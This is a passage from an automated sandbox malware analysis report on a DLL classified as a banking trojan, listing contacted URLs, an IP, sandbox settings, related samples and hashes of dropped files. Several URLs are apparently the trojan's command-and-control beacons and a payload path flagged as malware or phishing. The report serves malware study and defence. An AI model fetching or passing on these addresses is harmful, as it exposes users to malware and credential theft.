http://api3.lepini.at/api1/LMJLtOqdu8fp_2BNLOB5YBP/qly_2BfzDH/EAemu37KWi1Sk2xGU/KUNgOk1dCHS6/AgjNesC_2FL/0VRR3489g9d213/hnGFcgoP3NnJY57aNNU7X/g37VutmCLLvxlC3K/uWdTjPXn7_2BhUq/Ng_2FAVek6bgpkb4dt/OleaxmqWa/3cqZOMqKlEvnCHKOagPS/Ml3FT3Cf6J9pNtnQsAy/H2GMz5cmt0xhyUBUDbZV2P/wT6YuW4qyfVDR/pXcknYbm/8zZh_2FbRECix2oRrtcd2ZU/_2B7miWVVc/ZZTomZrPf3ghqQ7Sj/_2FENCrsSLt7/pXfjB	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/favicon.ico	false	Avira URL Cloud: safe	unknown
http://go.in100k.at/api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at/jvassets/xI/t64.dat	true	Avira URL Cloud: phishing	unknown
http://api3.lepini.at/api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M	false	Avira URL Cloud: safe	unknown
http://golang.feel500.at/favicon.ico	true	Avira URL Cloud: malware	unknown
http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo	rundll32.exe, 00000001.00000002.619811108.0000000000BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://github.com/Pester/Pester	powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp	false		high
http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/	rundll32.exe, 00000001.00000003.542325936.0000000000C41000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://constitution.org/usdeclar.txt	loaddll32.exe, rundll32.exe, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001E.00000002.617070310.00000232E1ED1000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.613638611.0000018F5E0F1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
35.228.31.40	unknown	United States		15169	GOOGLEUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	352339
Start date:	12.02.2021
Start time:	09:58:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	u8xtCk7fq8.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@39/68@13/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 58.5% Quality standard deviation: 5.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 105 Number of non-executed functions: 388
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 52.255.188.83, 104.43.139.144, 51.104.139.180, 52.155.217.156, 2.20.142.210, 2.20.142.209, 20.54.26.129, 51.103.5.186, 88.221.62.148, 92.122.213.194, 92.122.213.247, 152.199.19.161, 51.104.144.132, 184.30.20.56 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:00:55	API Interceptor	93x Sleep call for process: powershell.exe modified
10:01:18	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.228.31.40	2200.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	Attached_File_898318.xlsb	Get hash	malicious	Browse	api10.laptok.at/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	2200.dll	Get hash	malicious	Browse	208.67.222.222
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	208.67.222.222
	yytr.dll	Get hash	malicious	Browse	208.67.222.222
	xls.xls	Get hash	malicious	Browse	208.67.222.222
	Presentation_68192.xlsb	Get hash	malicious	Browse	208.67.222.222
	sup11_dump.dll	Get hash	malicious	Browse	208.67.222.222
	out.dll	Get hash	malicious	Browse	208.67.222.222
	crypt_3300.dll	Get hash	malicious	Browse	208.67.222.222
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	208.67.222.222
	6007d134e83fctar.dll	Get hash	malicious	Browse	208.67.222.222
	J5cB3wfXIZ.dll	Get hash	malicious	Browse	208.67.222.222
	6006bde674be5pdf.dll	Get hash	malicious	Browse	208.67.222.222
	mal.dll	Get hash	malicious	Browse	208.67.222.222
	fo.dll	Get hash	malicious	Browse	208.67.222.222
	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	208.67.222.222
	5fd885c499439tar.dll	Get hash	malicious	Browse	208.67.222.222
	5fc612703f844.dll	Get hash	malicious	Browse	208.67.222.222
	https___purefile24.top_4352wedfoifom.dll	Get hash	malicious	Browse	208.67.222.222
	vnaSKDMnLG.dll	Get hash	malicious	Browse	208.67.222.222
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	208.67.222.222
c56.lepini.at	2200.dll	Get hash	malicious	Browse	35.228.31.40
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	35.228.31.40
	Presentation_68192.xlsb	Get hash	malicious	Browse	47.89.250.152
	sup11_dump.dll	Get hash	malicious	Browse	45.138.24.6
	out.dll	Get hash	malicious	Browse	45.138.24.6
	crypt_3300.dll	Get hash	malicious	Browse	45.138.24.6
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	45.138.24.6
	u.dll	Get hash	malicious	Browse	46.173.218.93
	fo.dll	Get hash	malicious	Browse	46.173.218.93
	onerous.tar.dll	Get hash	malicious	Browse	47.241.19.44
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	47.241.19.44
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	47.241.19.44
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	47.241.19.44
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	47.241.19.44
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	Details!!.exe	Get hash	malicious	Browse	34.102.136.180
	RFQ 2027376.xlsx	Get hash	malicious	Browse	34.102.136.180
	FEB_2021.EXE	Get hash	malicious	Browse	34.102.136.180
	y0CRLCaQxA.exe	Get hash	malicious	Browse	142.250.102.155
	2200.dll	Get hash	malicious	Browse	35.228.31.40
	RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXE	Get hash	malicious	Browse	34.102.136.180
	#Ud83d#Udcde.htm	Get hash	malicious	Browse	142.250.179.193
	Spotify-v8.5.94.839_build_68949745-Mod-armeabi-v7a.apk	Get hash	malicious	Browse	172.217.17.110
	SecuriteInfo.com.Heur.20369.xls	Get hash	malicious	Browse	216.239.32.21
	#U2261#U0192#U00f4#U20a7.htm.htm	Get hash	malicious	Browse	142.250.179.193
	index_2021-02-11-18_10	Get hash	malicious	Browse	172.217.20.106
	att-1664057138.xls	Get hash	malicious	Browse	216.239.34.21
	1Akrien.exe	Get hash	malicious	Browse	8.8.8.8
	rlm00124.xls	Get hash	malicious	Browse	34.98.99.30
	AR4ldFlsyK.exe	Get hash	malicious	Browse	142.251.5.82
	PlayerHD-1.apk	Get hash	malicious	Browse	172.217.20.227
	o9VbySnzk7.exe	Get hash	malicious	Browse	34.90.236.200
	2H2JIKQ8tN.exe	Get hash	malicious	Browse	34.102.136.180
	zJY9vCRKzw.exe	Get hash	malicious	Browse	34.90.236.200
	order pdf.exe	Get hash	malicious	Browse	34.102.136.180

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{1B3B83AA-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.767667054742272
Encrypted:	false
SSDEEP:	96:rLZ8VZ82bWWtIAfDlx1M+ppTIr5TfF2DB:rLZwZ82bWWtTfDVMdVMB
MD5:	D8290CF14A86DB1CE9EA83C7C43481AC
SHA1:	307F56B1732E26C344C07EC7744653BB2C077A52
SHA-256:	574FA0B06659CDE1C1D8D146142D422CB277AEBAB4B27DF5E3569A874E89D98B
SHA-512:	39E5A475FD359DD4FA8D83277D5ADD9AF1D01BE97BCEC88A18FA634E635E60B38C6E43C9D80B3F6F44DF1597D981CA1C2E3E5FF4B26BE84BAE8103904E59E488
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{36092B4E-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	119048
Entropy (8bit):	2.2230750530483547
Encrypted:	false
SSDEEP:	384:rkBL764nDEpBafhKnLB6/fi7D0L4p8eb5yG5ut/JX:qQLc/q8kKD
MD5:	5161ACCFBF7717203E240CA5FBF27B87
SHA1:	7AB36AB5CA2A1775469A0722114EBBD443F25EAA
SHA-256:	6670918FC1D5AF2589BA5E795DFF42CE6989F618D4FA79F353C7A3259F0DDE44
SHA-512:	366EF7C7DC47B522B9205E37A1CD3E2B9AAAAFAB5F0FAE8B018FD69BCEBC7759F4C487CCF3D9F2278B5D0E32D759E6CB856BDE2D874E277D66ED1ED95C47B4B6
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1B3B83AC-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27596
Entropy (8bit):	1.913668141681748
Encrypted:	false
SSDEEP:	96:r1ZOQa6UBSHjt2lW7M3tGJ3ZTlGJ3ZXXA:r1ZOQa6UkHjt2lW7M3tGpZTlGpZnA
MD5:	11CDEE94EAC5C4C4A3B580AAA2A8DD11
SHA1:	DF4AFBBB639FE48783690075755B69ED1C6BB197
SHA-256:	CE1D1235855ECF49FF7215E10939BB682E572BD173FE28CB40938DF81D993FB7
SHA-512:	099498AD66CC6F104029B0337996B267F414F7B19223030D1714344723023765DB53790928DB75D2659EC31CEDFDFB7347A299993B446D04923F55D16A8EE476
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{36092B50-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28692
Entropy (8bit):	1.9191789647831818
Encrypted:	false
SSDEEP:	192:rpZuQn6hkYj52tWTMjl2CCDzegL12KCDzeg3r:rfr6SaIEQBazNyzf
MD5:	E63D7A5508082BA805704A5FD9FDE3B5
SHA1:	7901D7130F8BD3B806CFCF88366E2FD984F57CD4
SHA-256:	67D5EC8DED82DCB3F7CF760D0B865D22D0C63B9D3A40F1374A2FD03D06C769D9
SHA-512:	DDD10F6377B9702294418771EED97904CD25143461E431A9506A6B2C26CFE3D100B8F1C3227F25D8F5AD7391ABBA124C84E440D5156340AC8F2A294D1FB501D0
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{36092B52-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27580
Entropy (8bit):	1.909994164183987
Encrypted:	false
SSDEEP:	48:IwxGcprQGwpalJG4pQ37GrapbSU9GQpBaGHHpcAcTGUp87GzYpmphGopb/Jr9kSH:rHZ4Q96/BSUHjh2tWBMJdt/ZYlt/ZuCA
MD5:	F494E0344B0A8C9022C69F934E93B30D
SHA1:	DB59FF7E890096939E04797B0AC80041E623516F
SHA-256:	BFBDFFCC44EBE29A92EBD6C47F7CBC459EF844503FF6B93503EC51F55685342D
SHA-512:	5F261902578D00296CCEAFECC2891C82A84A657443EB561F43B912AB9C4D338476FF02C2CEE22F508751589F0C28F9BF7621E490C86E5DF6884922A798022093
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{36092B54-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28152
Entropy (8bit):	1.9209103065063102
Encrypted:	false
SSDEEP:	192:rAZcQ46ekljt2lWJM9xXONnwvlXONngLNnQA:rw1D/Bk8SHr9bh
MD5:	43BBD0A16866741A81951D41CB7FD2EC
SHA1:	3E5F12F5781B9900FEB9EFE9013555051D7A5F9A
SHA-256:	AC96BF56B0D911E972E449F99AF95E9A30A34D5B34ABD6974D785F30B0F3CE4B
SHA-512:	FA54EA511CBBE29944BBE7EC6B1C6BC9AEC4E11416C6E1CD999C95780EDA8969F4A827955EE35A1B21EE4010C88115422B695CE4F131C79909F5A9EB8E5497FA
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{36092B56-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	1.9226679164427423
Encrypted:	false
SSDEEP:	192:rVZeQ26EkKj92xWhvMXpdUyyQVd9UyyUA:rbbBpE0gWZdUR8d9UR/
MD5:	65DF65EED9032DF196A10D51F3B1CED6
SHA1:	731F3588323D0A3D295C85C71F16291C5E579170
SHA-256:	3420D468368E066DE6A233CD1247C7FCB5C133ADA038DF1955FBBCA91609B69F
SHA-512:	A9DE6CCDE1328D040B2F2CE6CC9DF199F339E9BD5CB3E1ED20C605DBD2BCF342C957771531F88A7A996F9F1A83C89D24722B986DE5A042BD9432860A2BBBAE8C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{36092B58-6D5C-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28692
Entropy (8bit):	1.9122790854680862
Encrypted:	false
SSDEEP:	192:reZRQ56Jk1jd2xGWWMjl5fnFB/V15f6/MfnFDr:rqmUaRU3/BhFBXh6yFf
MD5:	F2BAF00925649F0210EDD862FD592B9D
SHA1:	82944DD89038B69E8FBD2DC7449B97D320A91B1D
SHA-256:	31727DFE17CE2117DFF41947F94813BE472C63742053159307E763BF0A48F29B
SHA-512:	CAC22C9E188808CC66D93A7AEA0385A21A4668742A9F6E507292F4AECE34A255E96B71DEE58C59D32D82EA148FC9012940BA2F3C8EC8D42E8D2BE24C34D2502E
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.028157724019154
Encrypted:	false
SSDEEP:	12:TMHdNMNxOES5uDs5u1nWimI002EtM3MHdNMNxOES5uDs5u1nWimI00OVbVbkEtMb:2d6NxO7rmSZHKd6NxO7rmSZ7V6b
MD5:	AF0D56885797EA4E61A008767416ED40
SHA1:	7002B79C19DBE7B31A9B2201748C6FD33ED0F071
SHA-256:	CCD40075F95FADB9CE557AF60A3651CABC812C5633E1EABEA487D882E4E08962
SHA-512:	F881041792B966F66ABABBF3EAB36BE75A849BC7710876D40A8798C0754E9FA54AAA2357AD80608968E02BACCD003862514C3DF3848427EF0A35BA83EF0AA7A1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.071688788520163
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2k6JuDkJu1nWimI002EtM3MHdNMNxe2k6JuDkJu1nWimI00OVbkak6t:2d6Nxrtt2SZHKd6Nxrtt2SZ7VAa7b
MD5:	B4DBB799C67576579B0645801E9C7274
SHA1:	E2D31AFFF0E76C7B5E4DB71E3CC1627FA45C38F6
SHA-256:	EB6C3A9E54124BDF5D6C28916EB903B603433E164BDC526224B08D57267E55BC
SHA-512:	3EED4BDA03BB8A8259EEE5E28C176F5F17DD8509E650684449D30F512FC6AE3EED2985B9FBFE539523DA330C67B7C1F9036422569825862AFE5F523908C68FCF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xf12c0a0b,0x01d70168</date><accdate>0xf12c0a0b,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xf12c0a0b,0x01d70168</date><accdate>0xf12c0a0b,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	665
Entropy (8bit):	5.093893191795339
Encrypted:	false
SSDEEP:	12:TMHdNMNxvL7+vuD9+vu1nWimI002EtM3MHdNMNxvL7+vuD9+vu1nWimI00OVbmZt:2d6NxvvLrSZHKd6NxvvLrSZ7Vmb
MD5:	8937B644252A25C213B1EAA2D01A9D88
SHA1:	0C749F83ADC6BE78EC1DC51F53FB586D190E584F
SHA-256:	B268B06B462A7EF430443BC559A01E42CFB63589A89B0EA0CDF6AF5B588991D2
SHA-512:	C20B7C771EDE2DFFF036771086FB9AD0A87C5522097E06420BFBFEA7BD3BA844A68D0C00B73560084EABFA784906ACC11ADCD2086003B917A3D818E6D832EC12
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xf1333126,0x01d70168</date><accdate>0xf1333126,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xf1333126,0x01d70168</date><accdate>0xf1333126,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	650
Entropy (8bit):	5.042835885701056
Encrypted:	false
